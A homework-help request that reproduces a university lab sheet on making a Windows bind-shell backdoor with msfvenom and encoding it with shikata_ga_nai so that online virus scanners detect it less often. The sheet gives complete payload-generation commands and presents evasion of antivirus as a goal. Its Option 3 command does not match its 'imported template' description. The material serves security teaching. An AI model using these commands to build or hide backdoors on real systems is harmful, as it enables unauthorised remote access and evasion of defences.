ComputerScienceExpert
$18/per page/
hi i need help with this homework. Task is to creat Listener and ecode payload in Kali.
All detail is in homework sheet.
thank you
Lab Session #6: Malware Analysis
The lab involves one assignment (see section 5) due on week 8; after performing the
task, you need to present your results in a brief report (with screenshots) and submit by
the deadline. 1. Introduction
The purpose of this lab is to learn from a practical perspective about malware creation
and analysis. We will illustrate malware creation by focusing on a particular type of
malware referred to as backdoor.
We will create a piece of malware code and analyze the code using a free online virus
detection service. Online virus detection services combine the capability of several
existing antivirus engines.
To create the malware, we will use a tool from the Metasploit Framework, named
msfvenom (available in Kali), which allows creating and encoding payloads. 2. Backdoors
A dangerous type of malware often used by hackers is the so-called backdoor program.
Once a system has been compromised, it is important for the attacker to maintain
access to the system. It is not uncommon for system maintenance windows to occur
during the attack time frame. If the goal of the scheduled maintenance is to patch the
vulnerability exploited to gain access, the access will be terminated. Also if the system is
rebooted or the attacker loses connectivity, remote shell access may be permanently
lost.
Backdoors are ways around traditional defense obstacles (e.g. firewall, access control)
that give the attacker unrestricted access to the compromised system.
Quite often, backdoors are structured around a small piece of shellcode (or script) that
provides connectivity between the attack and victim machines, referred to as a listener
(program).
A listener can work as either a server or a client. Likewise, it can be used in two modes:
1. Shell mode (also called bind shell): the program is configured to listen for a
connection and spawn (automatically) a shell when a connection is made,
providing a command line to access the (exploited) system. 2. Reverse shell: the program is configured to request a connection starting from
the exploited system to an attack server under the control of the attacker.
In this lab session, we will illustrate backdoor creation using Metasploit Framework.
Specifically, we will use the msfvenom tool from the Metasploit Framework. Msfvenom
will be used initially to create a listener program and then to obfuscate (by encoding) the
generated payload. Antivirus protects machines from malware, but not all of it. There
are ways to pack malware to make it harder to detect. Using tools like msfvenom, it is
possible to render a malware completely invisible to antivirus.
Note:
There is a bug in metasploit console on the Kali version posted by Offensive Security.
This version is easier to install, but it has some minor issues.
When performing lab 6, I recommend using a regular command line console for the
practice and assignment questions. The bug may occur (if not already fixed), for
instance, when you type the following commands using msfconsole:
>msfvenom -h
or
>msfvenom -l
and so on.
The alternative is to simply use a regular command window as depicted later in this
document.
Note that this issue occurs only on the Kali version posted by Offensive Security. If you
are running the original version (but more painful to install) version from the Kali site,
then this doesn't concern you. 3. Malware Creation using msfvenom
Payload Generation
Msfvenom is a command-line instance of Metasploit that can be used to generate
different types of shellcode available in Metasploit. The generated shellcode can be
used to craft an exploit that is not currently available in the Metasploit Framework. To view the different options and variables available to this tool, open a command line in
Kali, and type the following command:
msfvenom -h To view the vast number of different types of shellcode that is available to be
customized for your specific exploit, type the following command:
msfvenom -l We will illustrate malware creation and analysis using a shellcode called
windows/shell_bind_tcp.
After typing the above command (msfvenom -l), scroll down the list (under Framework
Payloads) to locate the windows/shell_bind_tcp shellcode, as follows:
windows/shell_bind_tcp Listen for a connection and spawn a command shell The description of the shellcode indicates that its purpose is to listen for a connection
and spawn a command shell, which as explained earlier can be categorized as a
listener working in shell mode.
To find out how to customize a payload in metasploit, add the command-line argument
"O" with that payload, as follows:
msfvenom windows/shell_bind_tcp O This will list all of the available configurable options for that payload. Encoding
Msfvenom can also be used to encode a payload (or exploit code). Encoding can be
useful in converting an exploit code in an equivalent code that will perform the same
function as the original code but will look benign, and as such can escape (virus)
detection.
Check the various encoders that are available by running msfvenom with the option ‘-l':
msfvenom -l For instance, by scrolling down the list (under Framework Encoders), you’ll see the
shikata_ga_nai encoder as shown below:
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder That is one of the encoders that we’ll use later to encode our sample malware code. 4. Sample Malware Creation and Analysis
We will create a sample malware and try to detect it using a free online virus detection
service.
While there are several free online virus detection services, I will illustrate the example
using the Gary’s Hood Online Virus Scanner (http://www.garyshood.com/virus/) lab
which combines several existing scanners. Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a
virus, and won't spread, but it is detected by antivirus engines.
In Kali, in a Terminal window, execute these commands:
cd
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 --platform win -f exe >
/root/listen.exe
ls -l You should see the listen.exe file, as shown below: Note: Use different file names for your malware samples (instead of listen) since I
already run these files through the scanner. Analyzing the Listener with the Online Scanner
In Kali, click Applications, Internet, and open a Browser, for instance “Firefox Web
Browser" (if you installed it; or the default browser, which is Iceweasel browser).
In the browser, go to http://www.garyshood.com/virus/ Click the “Browse” button, and select the listen.exe
"listen.exe" appears in the "Choose File" box, as shown below: In the Online Scanner web page, click the "Scan" button.
The analysis shows that two of the antivirus engines detected the file--2 out of 4, when I
did it, as shown below. You may see different numbers, but some of the engines should
detect it. 5. Task (Assignment)
In this assignment, you are asked to recreate a listener with the same payload as in the
practice (see above) but also encode it. We will use the shikata_ga_nai encoder
available in Metasploit and an imported template file. 1. Explain briefly what is the purpose of a virus encoder, and what is the encoding
scheme used by shikata_ga_nai.
2. Download the following file:
http://www2.ohlone.edu/downloads/SSHSecureShellClient-3.2.9.exe
3. Create 3 new listener files using the following command sequence (make sure
that you use your own file name (i.e. not listen or listen 1); and you can use any
directory location):
Option 1: Basic Listener
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 -platform win -f exe > /root/Desktop/msfDir/listenFile1.exe Option 2: Basic Encoding
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 -platform win -f exe
-e x86/shikata_ga_nai > /root/Desktop/msfDir/listenFile2.exe Option 3: Using Basic Encoding & Imported Template
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 -platform win -f exe
-e x86/shikata_ga_nai > /root/Desktop/msfDir/listenFile3.exe 4. Analyze the 3 listener files (listenFile1.exe, listenFile2.exe, and listenFile3.exe)
using both Gary’s Hood (http://www.garyshood.com/virus) and Virus Total
(https://www.virustotal.com) scanners.
5. Comment the scanning results obtained before and after the encoding; discuss
the impact of the encoding and indicate whether or not the goal of hiding the
malware has been achieved.
6. Explain (3-4 paragraphs) why some virus detectors are able to detect encoded
exploit code while others are not.
Note: it is absolutely required to provide screenshots of the command windows (with
the commands) and the scan results. Summary
This lab session introduces malware creation and analysis by focusing on the case of
backdoor programs. The malware creation process is illustrated using the Metasploit
Framework.
The next lab session will provide hands on experience on web security by introducing
various web application attack scenarios.